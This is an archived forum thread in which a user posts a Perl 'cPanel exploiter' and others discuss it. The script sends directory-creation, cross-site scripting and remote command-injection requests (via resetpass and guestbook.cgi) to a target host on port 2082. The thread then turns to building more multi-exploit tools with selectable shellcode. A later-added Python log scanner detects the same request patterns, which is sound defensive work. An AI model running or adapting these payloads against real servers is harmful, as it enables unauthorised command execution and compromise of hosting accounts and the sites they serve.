Full Version: Cpanel Exploiter
shell6
This is a little cPanel exploiter that I wrote to practice with perl. Comments?

CODE
use Socket;
use IO::Socket;

$server = "";
$sploit = "";
$cmd = "";
$server = @ARGV[ 0 ];
$sploit = @ARGV[ 1 ];
$cmd = @ARGV [ 2 ];
if($server eq "") {
usage();
}
if($sploit eq "1") {
cpanel1();
}
if($sploit eq "2") {
cpanel2();
}
if($sploit eq "3") {
cpanel3();
}
if($sploit eq "4") {
cpanel4();
}
sub usage
{
printf("\nUsage :\n");
printf("perl h4xlm_cpanel_1.pl <server> <exploit> <cmd>\n\n");
printf("The <server> should be in www.host.com format.\n");
printf("The cmd is for if you want to enter in a one word shell command.\n");
printf("You can use spaces with \%20 only. If you put in spaces, the program\n");
printf("will only send the first word.\n");
printf("Exploits:\n");
printf("1> Directory Traversal/Creation Exploit Checker (Upto v.9.1.0-EDGE 70)\n");
printf("2> Cross-site Scripting Exploit Checker (Upto v.9.1.0-R85?)\n");
printf("3> Remote Command Entry Exploit Exploiter (5.3 - 9.1?)\n");
printf("4> Guestbook.cgi Remote Command Entry Exploiter (5.0 and below)\n");
}
sub cpanel1()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /frontend/x/err/erredit.html?dir=/public_html/&file=h4xlm.txt HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
sleep(1);
printf("If sucessful, http://$server/h4xlm.txt should exist\n");
printf("if it exists, it worked.\n");
close($sock);
exit(1);
}
sub cpanel2()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 1 sent ...\n");
sleep(1);
my $sock2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock2->autoflush(1);
print $sock2 "GET /frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.h4xlm.net/'</script> HTTP/1.1\r\n";
printf("\nGET request 2 sent ...\n");
sleep(1);
my $sock3 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock3->autoflush(1);
print $sock3 "GET /frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 3 sent ...\n");
sleep(1);
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock4->autoflush(1);
print $sock4 "GET /frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 4 sent ...\n");
sleep(1);
printf("If sucessful, in your browser while browsing $server you\n");
printf("should see at least one popup showing the word Vulnerable\n");
printf("and/or a popup to www.h4xlm.net\n");
close($sock);
close($sock2);
close($sock3);
close($sock4);
exit(1);
}
sub cpanel3()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /resetpass/?user=|\">$cmd\"| HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
printf("This should work. You can tell if you check yourself.\n");
sleep(1);
}
sub cpanel4()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
printf("This should work. You can tell if you check yourself.\n");
sleep(1);
}
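The four requests this script sends, seen from the defender's side: an added example (not part of the original post or thread) that scans web access log lines for those request patterns. The paths and parameter names come from the script; the function names, labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')
TS = "[01/Jan/2005:10:00:00 +0000]"  # constructed timestamp

def classify(target):
    """Label a request target that matches one of the script's four requests."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes, so %7C and a literal | are treated alike.
    params = parse_qs(parts.query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]
    # Legitimate use of the error-page editor can match too: treat as "review".
    if re.fullmatch(r"/frontend/[^/]+/err/erredit\.html", path) and {"dir", "file"} <= params.keys():
        return "erredit-file-create"
    if path.startswith("/resetpass") and any("|" in v for v in params.get("user", [])):
        return "resetpass-pipe"
    if path.endswith("/guestbook.cgi") and any("|" in v for v in params.get("template", [])):
        return "guestbook-pipe"
    if path.startswith("/frontend/") and any(re.search(r"<\s*script", v, re.I) for v in values):
        return "frontend-xss"
    return None

def scan(lines):
    """Return (client, label) for every log line that matches a known pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        label = classify(m.group(2)) if m else None
        if label:
            hits.append((m.group(1), label))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    f'203.0.113.7 - - {TS} "GET /frontend/x/err/erredit.html?dir=/public_html/&file=h4xlm.txt HTTP/1.1" 200 512',
    f'203.0.113.7 - - {TS} "GET /frontend/x2/denyip/del.html?ip=%3Cscript%3Ealert(%27Vulnerable%27)%3C/script%3E HTTP/1.1" 200 900',
    f'203.0.113.7 - - {TS} "GET /resetpass/?user=%7C%22%3ECMD%22%7C HTTP/1.1" 200 120',
    f'203.0.113.7 - - {TS} "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|CMD| HTTP/1.1" 200 80',
    f'198.51.100.20 - - {TS} "GET /frontend/x/index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, label in scan(SAMPLE):
        print(client, label)
```

An ordinary password-reset request such as `/resetpass/?user=alice` is not flagged; only a pipe character in the `user` or `template` value triggers the two command-entry labels.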
Insanity
I am interested in the cPanel exploit of yours. It says
cpanel1();
cpanel2();
cpanel3();
cpanel4();
implying there are 4 different ways to exploit it, if I'm not mistaken.

So this is just an exploit made up of older exploits, but all put in one so you can try multiple exploits with just the one program...

You have the Directory Traversal/Creation Exploit Checker (Upto v.9.1.0-EDGE 70)
Cross-site Scripting Exploit Checker (Upto v.9.1.0-R85?)
Remote Command Entry Exploit Exploiter (5.3 - 9.1?)
Guestbook.cgi Remote Command Entry Exploiter (5.0 and below)

So the guestbook.cgi and the remote command entry exploits are the actual exploits in the program? And the creation exploit checker and the cross site are just checkers, or do I have this all wrong...

Sorry, it's been a while since I have done programming, and with that I only did C... and not Perl... plus comments in the programming might be useful as well :)

All good programmers use comments, but I'll try it out... I'm sure it's great.
shell6
It is a multiple-exploit tool. But yeah, they are old exploits (I wrote it a long time ago :P).

QUOTE
So the guestbook.cgi and the remote command entry exploits are the actual exploits in the program? And the creation exploit checker and the cross site are just checkers, or do I have this all wrong...

Exactly!
Insanity
Alright, thanks for making that clear... oh well, it's a start. I think as you grow more knowledgeable of exploits etc. you will make some sweet multi-exploit idea that will rock... kinda like Whoppix :rolleyes:
shell6
Thanks. I also do C++ but I'm more comfortable with Perl sockets over C++ (however, I am better in everything else other than sockets in C++ instead of Perl, for some strange reason). Give me a list of exploits and I'll make another little one of these.
Insanity
Hey, um... you could try going to k-otik for exploits,
CODE
http://www.frsirt.com/exploits/
and just find any new exploits and make a multi-tasker of those exploits... but I dunno... my best advice for you is try that once or twice and then get really deep into the exploits and try to understand exactly how they work and are coded and see what they look for in the vulnerabilities, because if you can do that then you will have ideas of programs that might possibly be able to be exploited, and you will be able to program your own exploits :)
shell6
Great, I'll go there and SecurityFocus. I'll do this in a little while though because I'm away from home. :P

EDIT: I got an idea! I will also supply multiple shellcodes so that you can use the shellcode of your choice from a menu. So that way you're not stuck to the shellcode that I want you to use!
Invision Power Board © 2001-2005 Invision Power Services, Inc.